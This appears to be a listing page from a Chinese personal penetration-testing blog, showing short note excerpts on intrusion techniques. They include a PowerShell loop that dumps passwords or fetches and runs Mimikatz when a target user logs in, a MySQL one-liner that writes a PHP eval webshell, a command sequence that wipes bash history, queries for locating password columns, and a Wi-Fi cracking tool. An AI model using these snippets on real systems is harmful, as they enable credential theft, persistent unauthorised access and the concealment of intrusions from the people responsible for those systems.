个人笔记 | Storm'Blog

Windows x64 nmap 不能使用vpn的解决办法

2015-12-7 844 0

使用命令列出网卡 nmap -iflist 10.0.0.3/32 ppp0 266 199.125.71.27/32 eth1 4231 192.168.1.1 ppp0是你的vpn网卡 nmap -v -e ppp0 -n -T4 -Pn --unprivileged 127.0.0.1 或者这样 nmap -v -e eth1 -n -T4 -Pn --unprivileged 127.0.0.1

个人笔记

powershell循环检测需要的用户是否登录并抓密码

2015-11-25 powershell循环, 抓密码 399 0

while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #执行程序 Getpass.exe >>C:\test.txt } #时间单位毫秒 sleep -mill 3600000 } while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #下载执行Mimikatz IEX (New-Object N…继续阅读 »

个人笔记

渗透中快速摸清MSSQL数据库的一些查询语句

2015-11-20 数据库, 渗透测试 431 0

MSSQL库名查表 Select Name From 库名..SysObjects Where XType='U' order By Name MSSQL根据列名查表名 SELECT name FROM sysobjects WHERE id IN (SELECT id FROM syscolumns WHERE name='password' ) MSSQL根据列名模糊查表名 SELECT name FROM sysobjects WHERE id IN (SELECT id FROM syscolumns WHERE name like '%password%') MSSQL根据表名查列名 SELE…继续阅读 »

个人笔记

渗透中快速摸清MYSQL数据库的一些查询语句

2015-11-10 mysql 305 0

查询mysql包含某个字段的所有表 show tables like 'crm_%' MYSQL根据字段查表名 SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name'; SELECT column_name from information_schema.columns WHERE column_name LIKE ’%searchTerm%’ AND table_schema = ‘yourDB’ SELECT column_name from information_schema.columns W…继续阅读 »

个人笔记

渗透中快速摸清Oracle数据库的一些查询语句

2015-11-10 432 0

Oracle根据字段查表名 SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;

个人笔记

Mysql一句话导出Webshell

2015-11-9 mysql导出shell 779 0

Select '<? php eval($_POST[密码]);?>' into outfile 'd:/wwwroot/1.php';

个人笔记

linux清历史记录

2015-11-4 linux 289 0

cd ~ cat .bash_history > .h history -c;history -w;cat .h > .bash_history; rm -f .h;exit

个人笔记安全工具

自动化无线网破解工具Wifite v2

2015-11-3 Wifi破解, 无线破解 880 0

wifite是一款自动化wep、wpa破解工具，不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行，期间无需人工干预。先复制一下说明 COMMANDS -check <file> check capfile <file> for handshakes. -cracked display previously-cracked access points GLOBAL…继续阅读 »

个人笔记

服务枚举工具Amap v5.4

2015-6-28 Amap, 服务枚举 311 0

amap -bq 7kb.org 1-800 amap -bq 目标端口 amap v5.4 (c) 2011 by van Hauser <[email protected]> www.thc.org/thc-amap Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] Modes: -A Map applications: send triggers and analyse responses (default) -B Just grab b…继续阅读 »

个人笔记

Acunetix Web Vulnerability Scanner 10发布

2015-6-28 Wvs扫描 392 0

WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具，它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。下载地址如下 aHR0cDovL3d3dy41MnBvamllLmNuL3RocmVhZC…继续阅读 »